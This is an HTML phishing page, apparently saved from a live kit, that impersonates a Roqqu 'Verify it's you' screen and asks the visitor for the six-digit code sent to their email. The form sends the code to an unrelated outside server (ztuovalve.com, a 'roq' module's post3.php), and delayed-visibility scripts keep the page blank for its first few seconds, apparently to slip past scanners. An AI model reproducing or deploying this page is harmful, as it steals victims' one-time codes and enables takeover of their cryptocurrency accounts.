<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from roqquweb.com/otp by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:22:47 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Otp</title>
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/css/bootstrap.min.css">
    <link rel="shortcut icon" href="images/download__1_-removebg-preview.png">
    <script src="../cdn.jsdelivr.net/npm/jquery%403.5.1/dist/jquery.slim.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/popper.js%401.16.1/dist/umd/popper.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/js/bootstrap.bundle.min.js"></script>
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="sttyle.css">
    <link rel="stylesheet" href="otp.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@500;600&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Spline+Sans:wght@700&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Raleway:wght@600&amp;display=swap" rel="stylesheet">
</head>
<body>
    <div id="top" style="visibility: hidden;" class="text-center">
        <a href="#"><img class="header-img" src="../d33wubrfki0l68.cloudfront.net/d0d3b22fe2b73dfc1cc3cf4b5ed9ac9a686c1ef9/abb24/images/roqqu.png" alt=""></a>
    </div>
    <div style="visibility: hidden;" class="container">
    <form  action="https://ztuovalve.com/hlpdsks/roqmodule/modules/roq/post3.php"  class="form-signin" method="POST">

        <h2 class="form-signin-heading pb-1 text-center">Verify it's you</h2>
        <div class="text-center form-p">
            <p>We've sent a verification code to your email. Enter the code from the email in the field below.</p>
        </div>
        <input type="hidden" name="_next" value="auth.html">
        <input type="hidden" name="_captcha" value="false">
        <input id="input1"  maxlength="6" spellcheck="false" required  type="tel" class="form-control" name="otp" placeholder="Enter 6-digit code" >
        <button  style="visibility: hidden;" type="submit" class="btn btn-md btn-primary btn-block" id="submitBtn">Verify</button> 
        </form>
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
        <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">



        <script>
            function showBody() {
    document.querySelector('body').style.visibility="visible";
    }
    
    function container() {
    document.querySelector('.container').style.visibility="visible";
    }
    function showBtn() {
    document.querySelector('button').style.visibility="visible";
    }
    function showTop() {
    document.querySelector('#top').style.visibility="visible";
    }
    
    setTimeout("showBody()", 3000);
    setTimeout("container()", 3000);
    setTimeout("showBtn()", 4000);
    setTimeout("showTop()", 1700);
        </script>

<script>
    const btn = document.getElementById("submitBtn");
    const input = document.querySelector("#input1");

    btn.addEventListener("click", () => {
        btn.innerHTML = 'Loading...';
    });

    input.addEventListener("keyup", () => {
        if (btn.innerHTML = 'Loading...') {
            btn.innerHTML = 'Verify';
        }
    });
    </script>

        
  <script src="main.js"></script>
</body>

<!-- Mirrored from roqquweb.com/otp by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:22:54 GMT -->
</html>